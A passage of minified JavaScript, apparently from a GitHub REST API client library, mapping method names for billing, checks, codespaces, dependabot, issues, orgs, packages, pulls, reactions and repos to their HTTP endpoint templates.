/orgs/{org}/settings/billing/actions"],getGithubActionsBillingUser:["GET /users/{username}/settings/billing/actions"],getGithubAdvancedSecurityBillingGhe:["GET /enterprises/{enterprise}/settings/billing/advanced-security"],getGithubAdvancedSecurityBillingOrg:["GET /orgs/{org}/settings/billing/advanced-security"],getGithubPackagesBillingOrg:["GET /orgs/{org}/settings/billing/packages"],getGithubPackagesBillingUser:["GET /users/{username}/settings/billing/packages"],getSharedStorageBillingOrg:["GET /orgs/{org}/settings/billing/shared-storage"],getSharedStorageBillingUser:["GET /users/{username}/settings/billing/shared-storage"]},checks:{create:["POST /repos/{owner}/{repo}/check-runs"],createSuite:["POST /repos/{owner}/{repo}/check-suites"],get:["GET /repos/{owner}/{repo}/check-runs/{check_run_id}"],getSuite:["GET /repos/{owner}/{repo}/check-suites/{check_suite_id}"],listAnnotations:["GET /repos/{owner}/{repo}/check-runs/{check_run_id}/annotations"],listForRef:["GET /repos/{owner}/{repo}/commits/{ref}/check-runs"],listForSuite:["GET /repos/{owner}/{repo}/check-suites/{check_suite_id}/check-runs"],listSuitesForRef:["GET /repos/{owner}/{repo}/commits/{ref}/check-suites"],rerequestRun:["POST /repos/{owner}/{repo}/check-runs/{check_run_id}/rerequest"],rerequestSuite:["POST /repos/{owner}/{repo}/check-suites/{check_suite_id}/rerequest"],setSuitesPreferences:["PATCH /repos/{owner}/{repo}/check-suites/preferences"],update:["PATCH /repos/{owner}/{repo}/check-runs/{check_run_id}"]},codeScanning:{deleteAnalysis:["DELETE /repos/{owner}/{repo}/code-scanning/analyses/{analysis_id}{?confirm_delete}"],getAlert:["GET /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}",{},{renamedParameters:{alert_id:"alert_number"}}],getAnalysis:["GET /repos/{owner}/{repo}/code-scanning/analyses/{analysis_id}"],getCodeqlDatabase:["GET /repos/{owner}/{repo}/code-scanning/codeql/databases/{language}"],getSarif:["GET /repos/{owner}/{repo}/code-scanning/sarifs/{sarif_id}"],listAlertInstances:["GET /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}/instances"],listAlertsForEnterprise:["GET /enterprises/{enterprise}/code-scanning/alerts"],listAlertsForOrg:["GET /orgs/{org}/code-scanning/alerts"],listAlertsForRepo:["GET /repos/{owner}/{repo}/code-scanning/alerts"],listAlertsInstances:["GET /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}/instances",{},{renamed:["codeScanning","listAlertInstances"]}],listCodeqlDatabases:["GET /repos/{owner}/{repo}/code-scanning/codeql/databases"],listRecentAnalyses:["GET /repos/{owner}/{repo}/code-scanning/analyses"],updateAlert:["PATCH /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}"],uploadSarif:["POST /repos/{owner}/{repo}/code-scanning/sarifs"]},codesOfConduct:{getAllCodesOfConduct:["GET /codes_of_conduct"],getConductCode:["GET /codes_of_conduct/{key}"]},codespaces:{addRepositoryForSecretForAuthenticatedUser:["PUT /user/codespaces/secrets/{secret_name}/repositories/{repository_id}"],addSelectedRepoToOrgSecret:["PUT /organizations/{org}/codespaces/secrets/{secret_name}/repositories/{repository_id}"],codespaceMachinesForAuthenticatedUser:["GET /user/codespaces/{codespace_name}/machines"],createForAuthenticatedUser:["POST /user/codespaces"],createOrUpdateOrgSecret:["PUT /organizations/{org}/codespaces/secrets/{secret_name}"],createOrUpdateRepoSecret:["PUT /repos/{owner}/{repo}/codespaces/secrets/{secret_name}"],createOrUpdateSecretForAuthenticatedUser:["PUT /user/codespaces/secrets/{secret_name}"],createWithPrForAuthenticatedUser:["POST /repos/{owner}/{repo}/pulls/{pull_number}/codespaces"],createWithRepoForAuthenticatedUser:["POST /repos/{owner}/{repo}/codespaces"],deleteForAuthenticatedUser:["DELETE /user/codespaces/{codespace_name}"],deleteFromOrganization:["DELETE /orgs/{org}/members/{username}/codespaces/{codespace_name}"],deleteOrgSecret:["DELETE /organizations/{org}/codespaces/secrets/{secret_name}"],deleteRepoSecret:["DELETE /repos/{owner}/{repo}/codespaces/secrets/{secret_name}"],deleteSecretForAuthenticatedUser:["DELETE /user/codespaces/secrets/{secret_name}"],exportForAuthenticatedUser:["POST /user/codespaces/{codespace_name}/exports"],getExportDetailsForAuthenticatedUser:["GET /user/codespaces/{codespace_name}/exports/{export_id}"],getForAuthenticatedUser:["GET /user/codespaces/{codespace_name}"],getOrgPublicKey:["GET /organizations/{org}/codespaces/secrets/public-key"],getOrgSecret:["GET /organizations/{org}/codespaces/secrets/{secret_name}"],getPublicKeyForAuthenticatedUser:["GET /user/codespaces/secrets/public-key"],getRepoPublicKey:["GET /repos/{owner}/{repo}/codespaces/secrets/public-key"],getRepoSecret:["GET /repos/{owner}/{repo}/codespaces/secrets/{secret_name}"],getSecretForAuthenticatedUser:["GET /user/codespaces/secrets/{secret_name}"],listDevcontainersInRepositoryForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces/devcontainers"],listForAuthenticatedUser:["GET /user/codespaces"],listInOrganization:["GET /orgs/{org}/codespaces",{},{renamedParameters:{org_id:"org"}}],listInRepositoryForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces"],listOrgSecrets:["GET /organizations/{org}/codespaces/secrets"],listRepoSecrets:["GET /repos/{owner}/{repo}/codespaces/secrets"],listRepositoriesForSecretForAuthenticatedUser:["GET /user/codespaces/secrets/{secret_name}/repositories"],listSecretsForAuthenticatedUser:["GET /user/codespaces/secrets"],listSelectedReposForOrgSecret:["GET /organizations/{org}/codespaces/secrets/{secret_name}/repositories"],preFlightWithRepoForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces/new"],removeRepositoryForSecretForAuthenticatedUser:["DELETE /user/codespaces/secrets/{secret_name}/repositories/{repository_id}"],removeSelectedRepoFromOrgSecret:["DELETE /organizations/{org}/codespaces/secrets/{secret_name}/repositories/{repository_id}"],repoMachinesForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces/machines"],setRepositoriesForSecretForAuthenticatedUser:["PUT /user/codespaces/secrets/{secret_name}/repositories"],setSelectedReposForOrgSecret:["PUT /organizations/{org}/codespaces/secrets/{secret_name}/repositories"],startForAuthenticatedUser:["POST /user/codespaces/{codespace_name}/start"],stopForAuthenticatedUser:["POST /user/codespaces/{codespace_name}/stop"],stopInOrganization:["POST /orgs/{org}/members/{username}/codespaces/{codespace_name}/stop"],updateForAuthenticatedUser:["PATCH /user/codespaces/{codespace_name}"]},dependabot:{addSelectedRepoToOrgSecret:["PUT /orgs/{org}/dependabot/secrets/{secret_name}/repositories/{repository_id}"],createOrUpdateOrgSecret:["PUT /orgs/{org}/dependabot/secrets/{secret_name}"],createOrUpdateRepoSecret:["PUT /repos/{owner}/{repo}/dependabot/secrets/{secret_name}"],deleteOrgSecret:["DELETE /orgs/{org}/dependabot/secrets/{secret_name}"],deleteRepoSecret:["DELETE /repos/{owner}/{repo}/dependabot/secrets/{secret_name}"],getAlert:["GET /repos/{owner}/{repo}/dependabot/alerts/{alert_number}"],getOrgPublicKey:["GET /orgs/{org}/dependabot/secrets/public-key"],getOrgSecret:["GET /orgs/{org}/dependabot/secrets/{secret_name}"],getRepoPublicKey:["GET /repos/{owner}/{repo}/dependabot/secrets/public-key"],getRepoSecret:["GET /repos/{owner}/{repo}/dependabot/secrets/{secret_name}"],listAlertsForRepo:["GET /repos/{owner}/{repo}/dependabot/alerts"],listOrgSecrets:["GET /orgs/{org}/dependabot/secrets"],listRepoSecrets:["GET /repos/{owner}/{repo}/dependabot/secrets"],listSelectedReposForOrgSecret:["GET /orgs/{org}/dependabot/secrets/{secret_name}/repositories"],removeSelectedRepoFromOrgSecret:["DELETE /orgs/{org}/dependabot/secrets/{secret_name}/repositories/{repository_id}"],setSelectedReposForOrgSecret:["PUT /orgs/{org}/dependabot/secrets/{secret_name}/repositories"],updateAlert:["PATCH /repos/{owner}/{repo}/dependabot/alerts/{alert_number}"]},dependencyGraph:{createRepositorySnapshot:["POST /repos/{owner}/{repo}/dependency-graph/snapshots"],diffRange:["GET /repos/{owner}/{repo}/dependency-graph/compare/{basehead}"]},emojis:{get:["GET /emojis"]},enterpriseAdmin:{addCustomLabelsToSelfHostedRunnerForEnterprise:["POST /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],disableSelectedOrganizationGithubActionsEnterprise:["DELETE /enterprises/{enterprise}/actions/permissions/organizations/{org_id}"],enableSelectedOrganizationGithubActionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/organizations/{org_id}"],getAllowedActionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions/selected-actions"],getGithubActionsPermissionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions"],getServerStatistics:["GET /enterprise-installation/{enterprise_or_org}/server-statistics"],listLabelsForSelfHostedRunnerForEnterprise:["GET /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],listSelectedOrganizationsEnabledGithubActionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions/organizations"],removeAllCustomLabelsFromSelfHostedRunnerForEnterprise:["DELETE /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],removeCustomLabelFromSelfHostedRunnerForEnterprise:["DELETE /enterprises/{enterprise}/actions/runners/{runner_id}/labels/{name}"],setAllowedActionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/selected-actions"],setCustomLabelsForSelfHostedRunnerForEnterprise:["PUT /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],setGithubActionsPermissionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions"],setSelectedOrganizationsEnabledGithubActionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/organizations"]},gists:{checkIsStarred:["GET /gists/{gist_id}/star"],create:["POST /gists"],createComment:["POST /gists/{gist_id}/comments"],delete:["DELETE /gists/{gist_id}"],deleteComment:["DELETE /gists/{gist_id}/comments/{comment_id}"],fork:["POST /gists/{gist_id}/forks"],get:["GET /gists/{gist_id}"],getComment:["GET /gists/{gist_id}/comments/{comment_id}"],getRevision:["GET /gists/{gist_id}/{sha}"],list:["GET /gists"],listComments:["GET /gists/{gist_id}/comments"],listCommits:["GET /gists/{gist_id}/commits"],listForUser:["GET /users/{username}/gists"],listForks:["GET /gists/{gist_id}/forks"],listPublic:["GET /gists/public"],listStarred:["GET /gists/starred"],star:["PUT /gists/{gist_id}/star"],unstar:["DELETE /gists/{gist_id}/star"],update:["PATCH /gists/{gist_id}"],updateComment:["PATCH /gists/{gist_id}/comments/{comment_id}"]},git:{createBlob:["POST /repos/{owner}/{repo}/git/blobs"],createCommit:["POST /repos/{owner}/{repo}/git/commits"],createRef:["POST /repos/{owner}/{repo}/git/refs"],createTag:["POST /repos/{owner}/{repo}/git/tags"],createTree:["POST /repos/{owner}/{repo}/git/trees"],deleteRef:["DELETE /repos/{owner}/{repo}/git/refs/{ref}"],getBlob:["GET /repos/{owner}/{repo}/git/blobs/{file_sha}"],getCommit:["GET /repos/{owner}/{repo}/git/commits/{commit_sha}"],getRef:["GET /repos/{owner}/{repo}/git/ref/{ref}"],getTag:["GET /repos/{owner}/{repo}/git/tags/{tag_sha}"],getTree:["GET /repos/{owner}/{repo}/git/trees/{tree_sha}"],listMatchingRefs:["GET /repos/{owner}/{repo}/git/matching-refs/{ref}"],updateRef:["PATCH /repos/{owner}/{repo}/git/refs/{ref}"]},gitignore:{getAllTemplates:["GET /gitignore/templates"],getTemplate:["GET /gitignore/templates/{name}"]},interactions:{getRestrictionsForAuthenticatedUser:["GET /user/interaction-limits"],getRestrictionsForOrg:["GET /orgs/{org}/interaction-limits"],getRestrictionsForRepo:["GET /repos/{owner}/{repo}/interaction-limits"],getRestrictionsForYourPublicRepos:["GET /user/interaction-limits",{},{renamed:["interactions","getRestrictionsForAuthenticatedUser"]}],removeRestrictionsForAuthenticatedUser:["DELETE /user/interaction-limits"],removeRestrictionsForOrg:["DELETE /orgs/{org}/interaction-limits"],removeRestrictionsForRepo:["DELETE /repos/{owner}/{repo}/interaction-limits"],removeRestrictionsForYourPublicRepos:["DELETE /user/interaction-limits",{},{renamed:["interactions","removeRestrictionsForAuthenticatedUser"]}],setRestrictionsForAuthenticatedUser:["PUT /user/interaction-limits"],setRestrictionsForOrg:["PUT /orgs/{org}/interaction-limits"],setRestrictionsForRepo:["PUT /repos/{owner}/{repo}/interaction-limits"],setRestrictionsForYourPublicRepos:["PUT /user/interaction-limits",{},{renamed:["interactions","setRestrictionsForAuthenticatedUser"]}]},issues:{addAssignees:["POST /repos/{owner}/{repo}/issues/{issue_number}/assignees"],addLabels:["POST /repos/{owner}/{repo}/issues/{issue_number}/labels"],checkUserCanBeAssigned:["GET /repos/{owner}/{repo}/assignees/{assignee}"],create:["POST /repos/{owner}/{repo}/issues"],createComment:["POST /repos/{owner}/{repo}/issues/{issue_number}/comments"],createLabel:["POST /repos/{owner}/{repo}/labels"],createMilestone:["POST /repos/{owner}/{repo}/milestones"],deleteComment:["DELETE /repos/{owner}/{repo}/issues/comments/{comment_id}"],deleteLabel:["DELETE /repos/{owner}/{repo}/labels/{name}"],deleteMilestone:["DELETE /repos/{owner}/{repo}/milestones/{milestone_number}"],get:["GET /repos/{owner}/{repo}/issues/{issue_number}"],getComment:["GET /repos/{owner}/{repo}/issues/comments/{comment_id}"],getEvent:["GET /repos/{owner}/{repo}/issues/events/{event_id}"],getLabel:["GET /repos/{owner}/{repo}/labels/{name}"],getMilestone:["GET /repos/{owner}/{repo}/milestones/{milestone_number}"],list:["GET /issues"],listAssignees:["GET /repos/{owner}/{repo}/assignees"],listComments:["GET /repos/{owner}/{repo}/issues/{issue_number}/comments"],listCommentsForRepo:["GET /repos/{owner}/{repo}/issues/comments"],listEvents:["GET /repos/{owner}/{repo}/issues/{issue_number}/events"],listEventsForRepo:["GET /repos/{owner}/{repo}/issues/events"],listEventsForTimeline:["GET /repos/{owner}/{repo}/issues/{issue_number}/timeline"],listForAuthenticatedUser:["GET /user/issues"],listForOrg:["GET /orgs/{org}/issues"],listForRepo:["GET /repos/{owner}/{repo}/issues"],listLabelsForMilestone:["GET /repos/{owner}/{repo}/milestones/{milestone_number}/labels"],listLabelsForRepo:["GET /repos/{owner}/{repo}/labels"],listLabelsOnIssue:["GET /repos/{owner}/{repo}/issues/{issue_number}/labels"],listMilestones:["GET /repos/{owner}/{repo}/milestones"],lock:["PUT /repos/{owner}/{repo}/issues/{issue_number}/lock"],removeAllLabels:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/labels"],removeAssignees:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/assignees"],removeLabel:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/labels/{name}"],setLabels:["PUT /repos/{owner}/{repo}/issues/{issue_number}/labels"],unlock:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/lock"],update:["PATCH /repos/{owner}/{repo}/issues/{issue_number}"],updateComment:["PATCH /repos/{owner}/{repo}/issues/comments/{comment_id}"],updateLabel:["PATCH /repos/{owner}/{repo}/labels/{name}"],updateMilestone:["PATCH /repos/{owner}/{repo}/milestones/{milestone_number}"]},licenses:{get:["GET /licenses/{license}"],getAllCommonlyUsed:["GET /licenses"],getForRepo:["GET /repos/{owner}/{repo}/license"]},markdown:{render:["POST /markdown"],renderRaw:["POST /markdown/raw",{headers:{"content-type":"text/plain; charset=utf-8"}}]},meta:{get:["GET /meta"],getOctocat:["GET /octocat"],getZen:["GET /zen"],root:["GET /"]},migrations:{cancelImport:["DELETE /repos/{owner}/{repo}/import"],deleteArchiveForAuthenticatedUser:["DELETE /user/migrations/{migration_id}/archive"],deleteArchiveForOrg:["DELETE /orgs/{org}/migrations/{migration_id}/archive"],downloadArchiveForOrg:["GET /orgs/{org}/migrations/{migration_id}/archive"],getArchiveForAuthenticatedUser:["GET /user/migrations/{migration_id}/archive"],getCommitAuthors:["GET /repos/{owner}/{repo}/import/authors"],getImportStatus:["GET /repos/{owner}/{repo}/import"],getLargeFiles:["GET /repos/{owner}/{repo}/import/large_files"],getStatusForAuthenticatedUser:["GET /user/migrations/{migration_id}"],getStatusForOrg:["GET /orgs/{org}/migrations/{migration_id}"],listForAuthenticatedUser:["GET /user/migrations"],listForOrg:["GET /orgs/{org}/migrations"],listReposForAuthenticatedUser:["GET /user/migrations/{migration_id}/repositories"],listReposForOrg:["GET /orgs/{org}/migrations/{migration_id}/repositories"],listReposForUser:["GET /user/migrations/{migration_id}/repositories",{},{renamed:["migrations","listReposForAuthenticatedUser"]}],mapCommitAuthor:["PATCH /repos/{owner}/{repo}/import/authors/{author_id}"],setLfsPreference:["PATCH /repos/{owner}/{repo}/import/lfs"],startForAuthenticatedUser:["POST /user/migrations"],startForOrg:["POST /orgs/{org}/migrations"],startImport:["PUT /repos/{owner}/{repo}/import"],unlockRepoForAuthenticatedUser:["DELETE /user/migrations/{migration_id}/repos/{repo_name}/lock"],unlockRepoForOrg:["DELETE /orgs/{org}/migrations/{migration_id}/repos/{repo_name}/lock"],updateImport:["PATCH /repos/{owner}/{repo}/import"]},orgs:{addSecurityManagerTeam:["PUT /orgs/{org}/security-managers/teams/{team_slug}"],blockUser:["PUT /orgs/{org}/blocks/{username}"],cancelInvitation:["DELETE /orgs/{org}/invitations/{invitation_id}"],checkBlockedUser:["GET /orgs/{org}/blocks/{username}"],checkMembershipForUser:["GET /orgs/{org}/members/{username}"],checkPublicMembershipForUser:["GET /orgs/{org}/public_members/{username}"],convertMemberToOutsideCollaborator:["PUT /orgs/{org}/outside_collaborators/{username}"],createCustomRole:["POST /orgs/{org}/custom_roles"],createInvitation:["POST /orgs/{org}/invitations"],createWebhook:["POST /orgs/{org}/hooks"],deleteCustomRole:["DELETE /orgs/{org}/custom_roles/{role_id}"],deleteWebhook:["DELETE /orgs/{org}/hooks/{hook_id}"],enableOrDisableSecurityProductOnAllOrgRepos:["POST /orgs/{org}/{security_product}/{enablement}"],get:["GET /orgs/{org}"],getMembershipForAuthenticatedUser:["GET /user/memberships/orgs/{org}"],getMembershipForUser:["GET /orgs/{org}/memberships/{username}"],getWebhook:["GET /orgs/{org}/hooks/{hook_id}"],getWebhookConfigForOrg:["GET /orgs/{org}/hooks/{hook_id}/config"],getWebhookDelivery:["GET /orgs/{org}/hooks/{hook_id}/deliveries/{delivery_id}"],list:["GET /organizations"],listAppInstallations:["GET /orgs/{org}/installations"],listBlockedUsers:["GET /orgs/{org}/blocks"],listCustomRoles:["GET /organizations/{organization_id}/custom_roles"],listFailedInvitations:["GET /orgs/{org}/failed_invitations"],listFineGrainedPermissions:["GET /orgs/{org}/fine_grained_permissions"],listForAuthenticatedUser:["GET /user/orgs"],listForUser:["GET /users/{username}/orgs"],listInvitationTeams:["GET /orgs/{org}/invitations/{invitation_id}/teams"],listMembers:["GET /orgs/{org}/members"],listMembershipsForAuthenticatedUser:["GET /user/memberships/orgs"],listOutsideCollaborators:["GET /orgs/{org}/outside_collaborators"],listPendingInvitations:["GET /orgs/{org}/invitations"],listPublicMembers:["GET /orgs/{org}/public_members"],listSecurityManagerTeams:["GET /orgs/{org}/security-managers"],listWebhookDeliveries:["GET /orgs/{org}/hooks/{hook_id}/deliveries"],listWebhooks:["GET /orgs/{org}/hooks"],pingWebhook:["POST /orgs/{org}/hooks/{hook_id}/pings"],redeliverWebhookDelivery:["POST /orgs/{org}/hooks/{hook_id}/deliveries/{delivery_id}/attempts"],removeMember:["DELETE /orgs/{org}/members/{username}"],removeMembershipForUser:["DELETE /orgs/{org}/memberships/{username}"],removeOutsideCollaborator:["DELETE /orgs/{org}/outside_collaborators/{username}"],removePublicMembershipForAuthenticatedUser:["DELETE /orgs/{org}/public_members/{username}"],removeSecurityManagerTeam:["DELETE /orgs/{org}/security-managers/teams/{team_slug}"],setMembershipForUser:["PUT /orgs/{org}/memberships/{username}"],setPublicMembershipForAuthenticatedUser:["PUT /orgs/{org}/public_members/{username}"],unblockUser:["DELETE /orgs/{org}/blocks/{username}"],update:["PATCH /orgs/{org}"],updateCustomRole:["PATCH /orgs/{org}/custom_roles/{role_id}"],updateMembershipForAuthenticatedUser:["PATCH /user/memberships/orgs/{org}"],updateWebhook:["PATCH /orgs/{org}/hooks/{hook_id}"],updateWebhookConfigForOrg:["PATCH /orgs/{org}/hooks/{hook_id}/config"]},packages:{deletePackageForAuthenticatedUser:["DELETE /user/packages/{package_type}/{package_name}"],deletePackageForOrg:["DELETE /orgs/{org}/packages/{package_type}/{package_name}"],deletePackageForUser:["DELETE /users/{username}/packages/{package_type}/{package_name}"],deletePackageVersionForAuthenticatedUser:["DELETE /user/packages/{package_type}/{package_name}/versions/{package_version_id}"],deletePackageVersionForOrg:["DELETE /orgs/{org}/packages/{package_type}/{package_name}/versions/{package_version_id}"],deletePackageVersionForUser:["DELETE /users/{username}/packages/{package_type}/{package_name}/versions/{package_version_id}"],getAllPackageVersionsForAPackageOwnedByAnOrg:["GET /orgs/{org}/packages/{package_type}/{package_name}/versions",{},{renamed:["packages","getAllPackageVersionsForPackageOwnedByOrg"]}],getAllPackageVersionsForAPackageOwnedByTheAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}/versions",{},{renamed:["packages","getAllPackageVersionsForPackageOwnedByAuthenticatedUser"]}],getAllPackageVersionsForPackageOwnedByAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}/versions"],getAllPackageVersionsForPackageOwnedByOrg:["GET /orgs/{org}/packages/{package_type}/{package_name}/versions"],getAllPackageVersionsForPackageOwnedByUser:["GET /users/{username}/packages/{package_type}/{package_name}/versions"],getPackageForAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}"],getPackageForOrganization:["GET /orgs/{org}/packages/{package_type}/{package_name}"],getPackageForUser:["GET /users/{username}/packages/{package_type}/{package_name}"],getPackageVersionForAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}/versions/{package_version_id}"],getPackageVersionForOrganization:["GET /orgs/{org}/packages/{package_type}/{package_name}/versions/{package_version_id}"],getPackageVersionForUser:["GET /users/{username}/packages/{package_type}/{package_name}/versions/{package_version_id}"],listPackagesForAuthenticatedUser:["GET /user/packages"],listPackagesForOrganization:["GET /orgs/{org}/packages"],listPackagesForUser:["GET /users/{username}/packages"],restorePackageForAuthenticatedUser:["POST /user/packages/{package_type}/{package_name}/restore{?token}"],restorePackageForOrg:["POST /orgs/{org}/packages/{package_type}/{package_name}/restore{?token}"],restorePackageForUser:["POST /users/{username}/packages/{package_type}/{package_name}/restore{?token}"],restorePackageVersionForAuthenticatedUser:["POST /user/packages/{package_type}/{package_name}/versions/{package_version_id}/restore"],restorePackageVersionForOrg:["POST /orgs/{org}/packages/{package_type}/{package_name}/versions/{package_version_id}/restore"],restorePackageVersionForUser:["POST /users/{username}/packages/{package_type}/{package_name}/versions/{package_version_id}/restore"]},projects:{addCollaborator:["PUT /projects/{project_id}/collaborators/{username}"],createCard:["POST /projects/columns/{column_id}/cards"],createColumn:["POST /projects/{project_id}/columns"],createForAuthenticatedUser:["POST /user/projects"],createForOrg:["POST /orgs/{org}/projects"],createForRepo:["POST /repos/{owner}/{repo}/projects"],delete:["DELETE /projects/{project_id}"],deleteCard:["DELETE /projects/columns/cards/{card_id}"],deleteColumn:["DELETE /projects/columns/{column_id}"],get:["GET /projects/{project_id}"],getCard:["GET /projects/columns/cards/{card_id}"],getColumn:["GET /projects/columns/{column_id}"],getPermissionForUser:["GET /projects/{project_id}/collaborators/{username}/permission"],listCards:["GET /projects/columns/{column_id}/cards"],listCollaborators:["GET /projects/{project_id}/collaborators"],listColumns:["GET /projects/{project_id}/columns"],listForOrg:["GET /orgs/{org}/projects"],listForRepo:["GET /repos/{owner}/{repo}/projects"],listForUser:["GET /users/{username}/projects"],moveCard:["POST /projects/columns/cards/{card_id}/moves"],moveColumn:["POST /projects/columns/{column_id}/moves"],removeCollaborator:["DELETE /projects/{project_id}/collaborators/{username}"],update:["PATCH /projects/{project_id}"],updateCard:["PATCH /projects/columns/cards/{card_id}"],updateColumn:["PATCH /projects/columns/{column_id}"]},pulls:{checkIfMerged:["GET /repos/{owner}/{repo}/pulls/{pull_number}/merge"],create:["POST /repos/{owner}/{repo}/pulls"],createReplyForReviewComment:["POST /repos/{owner}/{repo}/pulls/{pull_number}/comments/{comment_id}/replies"],createReview:["POST /repos/{owner}/{repo}/pulls/{pull_number}/reviews"],createReviewComment:["POST /repos/{owner}/{repo}/pulls/{pull_number}/comments"],deletePendingReview:["DELETE /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}"],deleteReviewComment:["DELETE /repos/{owner}/{repo}/pulls/comments/{comment_id}"],dismissReview:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}/dismissals"],get:["GET /repos/{owner}/{repo}/pulls/{pull_number}"],getReview:["GET /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}"],getReviewComment:["GET /repos/{owner}/{repo}/pulls/comments/{comment_id}"],list:["GET /repos/{owner}/{repo}/pulls"],listCommentsForReview:["GET /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}/comments"],listCommits:["GET /repos/{owner}/{repo}/pulls/{pull_number}/commits"],listFiles:["GET /repos/{owner}/{repo}/pulls/{pull_number}/files"],listRequestedReviewers:["GET /repos/{owner}/{repo}/pulls/{pull_number}/requested_reviewers"],listReviewComments:["GET /repos/{owner}/{repo}/pulls/{pull_number}/comments"],listReviewCommentsForRepo:["GET /repos/{owner}/{repo}/pulls/comments"],listReviews:["GET /repos/{owner}/{repo}/pulls/{pull_number}/reviews"],merge:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/merge"],removeRequestedReviewers:["DELETE /repos/{owner}/{repo}/pulls/{pull_number}/requested_reviewers"],requestReviewers:["POST /repos/{owner}/{repo}/pulls/{pull_number}/requested_reviewers"],submitReview:["POST /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}/events"],update:["PATCH /repos/{owner}/{repo}/pulls/{pull_number}"],updateBranch:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/update-branch"],updateReview:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}"],updateReviewComment:["PATCH /repos/{owner}/{repo}/pulls/comments/{comment_id}"]},rateLimit:{get:["GET /rate_limit"]},reactions:{createForCommitComment:["POST /repos/{owner}/{repo}/comments/{comment_id}/reactions"],createForIssue:["POST /repos/{owner}/{repo}/issues/{issue_number}/reactions"],createForIssueComment:["POST /repos/{owner}/{repo}/issues/comments/{comment_id}/reactions"],createForPullRequestReviewComment:["POST /repos/{owner}/{repo}/pulls/comments/{comment_id}/reactions"],createForRelease:["POST /repos/{owner}/{repo}/releases/{release_id}/reactions"],createForTeamDiscussionCommentInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}/reactions"],createForTeamDiscussionInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/reactions"],deleteForCommitComment:["DELETE /repos/{owner}/{repo}/comments/{comment_id}/reactions/{reaction_id}"],deleteForIssue:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/reactions/{reaction_id}"],deleteForIssueComment:["DELETE /repos/{owner}/{repo}/issues/comments/{comment_id}/reactions/{reaction_id}"],deleteForPullRequestComment:["DELETE /repos/{owner}/{repo}/pulls/comments/{comment_id}/reactions/{reaction_id}"],deleteForRelease:["DELETE /repos/{owner}/{repo}/releases/{release_id}/reactions/{reaction_id}"],deleteForTeamDiscussion:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/reactions/{reaction_id}"],deleteForTeamDiscussionComment:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}/reactions/{reaction_id}"],listForCommitComment:["GET /repos/{owner}/{repo}/comments/{comment_id}/reactions"],listForIssue:["GET /repos/{owner}/{repo}/issues/{issue_number}/reactions"],listForIssueComment:["GET /repos/{owner}/{repo}/issues/comments/{comment_id}/reactions"],listForPullRequestReviewComment:["GET /repos/{owner}/{repo}/pulls/comments/{comment_id}/reactions"],listForRelease:["GET /repos/{owner}/{repo}/releases/{release_id}/reactions"],listForTeamDiscussionCommentInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}/reactions"],listForTeamDiscussionInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/reactions"]},repos:{acceptInvitation:["PATCH /user/repository_invitations/{invitation_id}",{},{renamed:["repos","acceptInvitationForAuthenticatedUser"]}],acceptInvitationForAuthenticatedUser:["PATCH /user/repository_invitations/{invitation_id}"],addAppAccessRestrictions:["POST /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps",{},{mapToData:"apps"}],addCollaborator:["PUT /repos/{owner}/{repo}/collaborators/{username}"],addStatusCheckContexts:["POST /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts",{},{mapToData:"contexts"}],addTeamAccessRestrictions:["POST /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams",{},{mapToData:"teams"}],addUserAccessRestrictions:["POST /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users",{},{mapToData:"users"}],checkCollaborator:["GET /repos/{owner}/{repo}/collaborators/{username}"],checkVulnerabilityAlerts:["GET /repos/{owner}/{repo}/vulnerability-alerts"],codeownersErrors:["GET /repos/{owner}/{repo}/codeowners/errors"],compareCommits:["GET /repos/{owner}/{repo}/compare/{base}...{head}"],compareCommitsWithBasehead:["GET /repos/{owner}/{repo}/compare/{basehead}"],createAutolink:["POST /repos/{owner}/{repo}/autolinks"],createCommitComment:["POST /repos/{owner}/{repo}/commits/{commit_sha}/comments"],createCommitSignatureProtection:["POST /repos/{owner}/{repo}/branches/{branch}/protection/required_signatures"],createCommitStatus:["POST /repos/{owner}/{repo}/statuses/{sha}"],createDeployKey:["POST 